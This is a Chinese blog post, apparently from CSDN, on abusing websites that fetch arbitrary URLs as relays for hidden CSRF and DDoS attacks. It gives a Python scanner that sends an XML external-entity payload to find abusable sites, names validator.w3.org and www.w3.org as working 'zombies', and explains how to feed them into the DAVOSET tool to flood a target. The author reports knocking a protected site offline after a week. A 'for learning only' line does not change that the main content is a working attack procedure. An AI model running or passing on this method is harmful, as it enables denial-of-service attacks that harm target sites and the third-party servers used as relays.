功能滥用漏洞研究

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量1.1k 收藏 21
点赞数 25
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64600147/article/details/135550045
版权




允许向其他网站(任意网页)发出请求的网站存在功能滥用漏洞,可用于对其他网站进行 CSRF 攻击

对于这些攻击,可以利用功能滥用漏洞(类似于本文中列出的漏洞)和远程文件包含漏洞(如 PHP 应用程序中的漏洞)——这就是通过 RFI 的功能滥用。

当需要对另一个站点进行隐藏的CSRF攻击(以免暴露)、进行DoS和DDoS攻击以及进行其他攻击,特别是执行不同的攻击时,可能需要这种攻击方法


这种攻击方法的优点。

这种利用外部站点攻击其他站点的方法具有以下优点(与使用自己的计算机相比):

使用其他服务器的资源。
隐藏引荐来源网址(与通过站点用户进行的 CSRF 攻击相比)。
隐藏自己的IP,除了隐藏攻击源外,还可以用来绕过IP限制。
利用外部站点的服务器对其他站点进行 DoS 攻击。
利用外部站点的服务器对其他站点进行DDoS攻击。
判断该漏洞的Poc

list.txt文件格式:

域名;域名路径

如果是
http://websecurity.com.ua/4322/
那么就是websecurity.com.ua;/4322/

贴代码

import socket
with open("list.txt", 'r', ) as file:
    content2 = file.read()
result = content2.split("\n")
for i in range(0, len(result)):
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    as1 = result[i].split(";")
    di = '{}'.format(i)
    print(di + "\n")
    server_address = (as1[0], 80)
    as1[0] = as1[0].encode()
    as1[1] = as1[1].encode()
    try:
        client_socket.connect(server_address)
        client_socket.sendall(b'POST / HTTP/1.1\n')
        client_socket.sendall(b'Host: ' + as1[0] + b' \n')
        client_socket.sendall(b'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n')
        client_socket.sendall(b'Accept: */*\n')
        with open('XML.txt', 'r') as file:
            content = file.read()
        body = len(content)
        if (type(body) is int):
            body = '{}'.format(body)
            body = body.encode()
        client_socket.sendall(b'Content-Length: ' + body + b'\n')
        client_socket.sendall(b'Content-Type: application/x-www-form-urlencoded\n')
        client_socket.sendall(b"Connection: close\n\n")
        content = content.encode()
        client_socket.sendall(content + b"\r\n\r\n")
        data = client_socket.recv(1024)
        as2 = data.decode().split("HTTP/1.1")
        as3 = as2[1].strip()
        data = as3[0:3]
        data = int(data)
        if data < 400:
            data = str(data)
            print("Ok" + data + "\n")
        else:
            data = str(data)
            print("NO" + data + "\n")
        client_socket.close()
    except Exception as e:
        result4 = str(e).split("\n")
        print(result4[len(result4) - 1] + "\n")
        continue




XML.txt内容
 

<?xml version="1.0"?>

<!DOCTYPE foo [

<!ELEMENT methodName ANY>

<!ENTITY xxe SYSTEM "http://site" >]>

<methodCall>

<methodName>&xxe;</methodName>

</methodCall>



现在测试validator.w3.org/check?uri=和www.w3.org是否存在漏洞

编辑list.txt

输入validator.w3.org;/check?uri=

换行

输入
www.w3.org;/RDF/Validator/ARPServlet?URI=

运行结果


输出

Ok301

1

Ok301

都存在功能滥用

漏洞利用

打开DAVOSET 1.1.9工具(DAVOSET 官网 http://websecurity.com.ua/davoset/ )
先编辑list.txt

编辑格式

域名;请求方式;发送的文件

扫描出的都是XML请求,用XML.txt,所以是 域名;XML;XML.txt

将刚刚的两个僵尸输入list.txt

http://www.w3.org/;XML;XML.txt

http://validator.w3.org

运行davoset.pl


输入需要攻击的域名

攻击完成后,一般不重复攻击,只需要静静等待(僵尸需要先打死高防ip,才能打死服务器,时间较长)。

作者测试结果

目标:100GB高防

攻击后等待了一个星期后网站测速都无法访问

总结:虽然能进行DDoS攻击但是等待时间长,不适合攻击高防服务器

注:本文章直供学习

版权声明
本文仅代表作者观点,不代表平台立场。

本文系作者授权百家号发表,未经许可,不得转载。


联系我们:baijiahao@baidu.com

百家号独家出品
 

qq_64600147
关注
  • 25
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
[系统安全] 十五.Chrome密码保存功能渗透解析、Chrome蓝屏漏洞及音乐软件漏洞复现
杨秀璋的专栏
01-21 9820
作者前面详细介绍了熊猫烧香病毒的逆向分析过程。这篇文章换个主题继续介绍,本文将对Chrome浏览器保留密码的功能进行渗透解析;同时复现一个最近流行的漏洞,通过Chrome浏览器实现Win10蓝屏;最后介绍音乐软件的加密功能漏洞复现。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,开发厂商进行相关的漏洞修补,安全保障任重道远。
漏洞类型
热门推荐
StoriesWine
02-23 1万+
漏洞类型 一、漏洞含义 漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。漏洞可能来自应用软件或操作系统设计时的缺陷或编码时产生的错误,也可能来自业务在交互处理过程中的设计缺陷或逻辑流程上的不合理之处。这些缺陷、错误或不合理之处可能被有意或无意地利用,从而对一个组织的资产或运行造成不利影响,如信息系统被攻击或控制,重要资料被窃取,用户数据...
功能滥用漏洞研究续篇
qq_64600147的博客
01-19 685
依次扫描aaaaaa.com到zzzzzz.com的网站是否存在漏洞
Yapi Mock RCE 漏洞复现分析
灰蜗牛
07-12 2364
Yapi Mock RCE 漏洞复现分析 文章目录Yapi Mock RCE 漏洞复现分析0x01 基本信息0x02 漏洞复现0x03 漏洞分析0x04 威胁排查0x05 缓解措施 0x01 基本信息 漏洞名称 : YAPI远程代码执行漏洞 组件名称 : YAPI 影响范围 : YAPI <= 1.9.2, 漏洞类型 :远程代码执行 利用条件 : ​ 1、用户认证:需要用户认证 ​ 2、触发方式:远程 综合评价 : <综合评定利用难度>:中等,需要用户认证。 <综合评定威胁等级&gt
谷歌推出关于滥用研究资助的新型试验计划
smellycat000的专栏
06-07 100
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士谷歌宣布,在现有的漏洞研究资助计划 (Vulnerability Research Grants) 和漏洞奖励计划 (Vulner...
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1396
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
win10蓝屏漏洞
Vdieoo的博客
01-28 1350
Windows 10 错误在您访问此位置时使电脑崩溃 Windows 10 中的 Bug 只需在浏览器的地址栏中打开某个路径或使用其他 Windows 命令,即可导致操作系统崩溃与死亡蓝屏。 上周,BleepingComputer 了解到 Windows 安全研究人员在 Twitter 上披露的两个错误,这些错误可能会在各种攻击中被攻击者滥用。 第一个错误允许非特权用户或程序输入单个命令,导致 NTFS 卷被标记为已损坏。虽然 chkdsk 在许多测试中解决了此问题,但我们的一个测试表明,该命令导
Jackson反序列化代码执行漏洞
I want to know a little more.
06-09 2306
在我们的一次研究过程中,我们分析了一个使用Jackson库对JSON进行反序列化的应用程序。在分析过程中,我们寻找到一个反序列化漏洞,并可以对反序列化的类进行控制。在本文中,我们将向读者展示攻击者如何利用此反序列化漏洞来触发服务器端请求伪造(SSRF)和远程代码执行等攻击。 该研究催生了新的CVE-2019-12384生成,并影响到了一系列RedHat产品: 漏洞攻击条件 正如Jackson在On Jackson CVEs中写到的那样:下面是利用工具需要的要求: (1)应用程序接受由不受信任的客
XSS漏洞
2401_83181186的博客
04-25 804
XSS漏洞介绍以及beef,waf简介
中间件漏洞合集.zip
07-15
"中间件漏洞合集.zip"是一个包含多个中间件安全漏洞信息的压缩文件,主要目的是供学习和研究,以提升网络安全意识和防护能力。下面我们将深入探讨中间件漏洞的相关知识。 1. **中间件的概念与作用** 中间件是一种...
yaml反序化漏洞本地环境复现
11-23
了解并复现yaml反序列化漏洞有助于提升对这类安全问题的认识,这对于开发者和安全研究人员来说至关重要。在实际应用中,务必对从不可信源接收的YAML数据进行严格的输入验证和安全处理,防止此类漏洞的利用。
漏洞分析代码及文件
05-31
防止这类漏洞的方法包括使用安全编程技术,如边界检查、堆栈 Canary 和编译器的地址空间布局随机化(ASLR)功能。 文件“drops╬─╒┬、drops文章”可能包含了关于这些主题的详细文章和案例研究,这将帮助读者深入...
android漏洞福利包
04-04
尽管不一定是恶意的,但其功能可能被滥用。 7. **RCE(远程代码执行)**:这类漏洞允许攻击者在目标设备上执行任意代码,通常是最严重的Android漏洞类型。 8. **信息泄露**:这类漏洞可能导致用户的个人信息、位置...
东航建设漏洞管理平台的探索实践
03-15
该规定还鼓励企业设立安全漏洞奖励机制,以激励白帽子等安全研究人员发现并通报漏洞,形成良性互动,提升产品安全。同时,规定强调了漏洞信息发布的规范,防止信息滥用,避免恶意炒作或违法犯罪活动。 对于甲方安全...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 275
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 554
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 974
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 191
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
王老师.趣谈SRC逻辑漏洞挖掘.pdf
07-09
"王老师的PDF课程《趣谈SRC逻辑漏洞挖掘》主要涵盖了信息收集、案例分析和学习方法,旨在帮助安全研究人员深入理解SRC(Security Response Center)中的逻辑漏洞挖掘技术。王老师是Day1安全团队的创始人,拥有丰富的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值